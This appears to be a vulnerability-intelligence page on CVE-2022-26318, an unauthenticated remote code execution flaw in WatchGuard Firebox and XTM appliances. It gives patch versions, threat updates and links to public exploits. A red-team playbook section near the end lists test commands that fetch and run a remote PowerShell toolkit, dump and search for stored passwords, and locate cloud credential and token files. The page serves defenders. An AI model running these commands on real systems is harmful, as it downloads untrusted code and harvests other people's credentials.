CVE-2022-26318
Overview
This vulnerability is a remote code execution flaw caused by improper input validation in WatchGuard Firebox and XTM appliances running Fireware OS. The root cause lies in a component of the Fireware operating system that processes unauthenticated network requests, allowing execution of arbitrary code due to insufficient access control and validation mechanisms. The affected feature is the network-facing service responsible for handling management or protocol-specific commands prior to authentication.
Vulnerability Description
On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.
Impact
An unauthenticated attacker can remotely execute arbitrary code on affected WatchGuard Firebox and XTM devices, gaining full control over the system. This enables complete compromise of the firewall appliance, including access to internal networks, interception or modification of traffic, and disruption of network security functions. No prior credentials or user interaction are needed, allowing attackers to exploit the vulnerability remotely and potentially pivot within the protected environment, leading to severe operational and data security consequences.
Solution
Apply the Fireware OS updates released by WatchGuard to remediate this vulnerability. Specifically, upgrade affected devices to version 12.7.2_U2 or later, 12.1.3_U8 or later for 12.x branches, or 12.5.9_U2 or later for 12.2.x through 12.5.x versions. Detailed patch instructions and release notes are available at WatchGuard’s official support page: https://www.watchguard.com/support/release-notes/fireware/12/en-US/EN_ReleaseNotes_Fireware_12_7_2/index.html#Fireware/en-US/resolved_issues.html. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question affects WatchGuard Firebox and XTM appliances, enabling unauthenticated users to execute arbitrary code on the devices. This critical flaw arises from insufficient input validation within the Fireware OS, which is the operating system that powers these security appliances. Specifically, the issue is present in versions prior to 12.7.2_U2, as well as in various iterations of the 12.x and 12.2.x to 12.5.x series. The ability to execute arbitrary code without authentication poses a significant risk, as it allows attackers to gain control over the affected devices, potentially leading to unauthorized access to sensitive information and network resources.
Exploitation of this vulnerability can occur through multiple attack vectors, primarily targeting the management interfaces of the Firebox and XTM appliances. An attacker could leverage network access to send specially crafted requests to the device, triggering the execution of malicious code. Given that the vulnerability does not require authentication, even a remote attacker with no prior access to the network could initiate an attack. Scenarios may include using automated scripts to scan for vulnerable devices, followed by the execution of payloads that could compromise the integrity of the network, disrupt services, or facilitate further attacks on connected systems.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on these appliances for network security. Successful exploitation could lead to a complete takeover of the device, allowing attackers to manipulate firewall rules, intercept traffic, or launch attacks against internal resources. The potential for data breaches is significant, as attackers could exfiltrate sensitive information or deploy ransomware within the network. The business risks associated with such incidents include financial losses, reputational damage, regulatory penalties, and the costs associated with incident response and recovery efforts.
To detect and mitigate this vulnerability, organizations should prioritize updating their Fireware OS to the latest patched versions. Regularly applying security updates is essential to protect against known vulnerabilities. Additionally, implementing network segmentation can limit exposure, ensuring that only authorized personnel have access to management interfaces. Intrusion detection systems (IDS) can be deployed to monitor for unusual traffic patterns that may indicate an attempted exploitation. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability affecting WatchGuard Firebox and XTM appliances represents a critical security risk that can lead to severe consequences for organizations. The ease of exploitation, combined with the potential for significant impact, underscores the importance of maintaining up-to-date systems and employing robust security practices. By taking proactive measures to detect and mitigate this vulnerability, organizations can better protect their networks and sensitive information from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-26318, accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. Notably, the release of a Metasploit module has significantly lowered the technical barrier for adversaries to execute remote code on vulnerable WatchGuard Firebox and XTM appliances. This development coincides with the vulnerability’s addition to the CISA KEV catalog and an updated CVSS score reflecting its critical severity. Our telemetry indicates that while exploitation attempts have surged sharply, the EPSS score remains high, signaling sustained exploitability despite a slight recent downward trend. The proliferation of automated tools and exploit frameworks increases the likelihood of widespread opportunistic attacks, elevating the threat landscape from theoretical to actively weaponized. Consequently, the risk level for affected organizations has intensified, underscoring the urgency for defenders to prioritize detection and response capabilities against this vulnerability.
Update 2 — August 03, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-26318, with telemetry indicating a sustained upward trend in adversary activity. Although the EPSS score shows a marginal decrease, this metric remains elevated, underscoring the continued exploitability of the vulnerability. Concurrently, new proof-of-concept exploits have surfaced, including updates compatible with the latest Python versions, alongside a mature Metasploit module that facilitates automated attacks against vulnerable WatchGuard Firebox and XTM appliances. This expansion of publicly available, user-friendly exploit tools significantly lowers the barrier to entry for threat actors, increasing the likelihood of opportunistic and widespread exploitation. The evolving exploit landscape, combined with the persistent critical severity of the vulnerability, elevates the threat level for organizations still running affected Fireware OS versions. Defenders should recognize that the risk environment is intensifying as adversaries leverage these developments to expand their attack campaigns.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Watchguard | Fireware | All |
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | All |
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | All |
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u1:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u2:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u3:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u4:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u5:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u6:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.1.3 |
cpe:2.3:o:watchguard:fireware:12.1.3:u7:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.5.9 |
cpe:2.3:o:watchguard:fireware:12.5.9:u1:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 12.7.2 |
cpe:2.3:o:watchguard:fireware:12.7.2:u1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WatchGuard XTM Firebox Unauthenticated Remote Command Execution
exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
|
- | Unknown | unix | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
misterxid/watchguard_cve-2022-26318
|
misterxid | 11 | 9 | 2022-03-28 | View |
|
h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318
Watchguard RCE POC CVE-2022-26318
|
h3llk4t3 | 2 | 2 | 2022-04-18 | View |
|
BabyTeam1024/CVE-2022-26318
|
BabyTeam1024 | 2 | 1 | 2022-05-21 | View |
|
egilas/Watchguard-RCE-POC-CVE-2022-26318
PoC for Watchguard CVE-2022-26318 updated to Python3.12
|
egilas | 0 | 0 | 2024-12-05 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-26318 |
| watchguard.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.watchguard.com/support/release-notes/fireware/12/en-US/EN_ReleaseNotes_Fireware_12_7_2/index.html#Fireware/en-US/resolved_issues.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-26318 |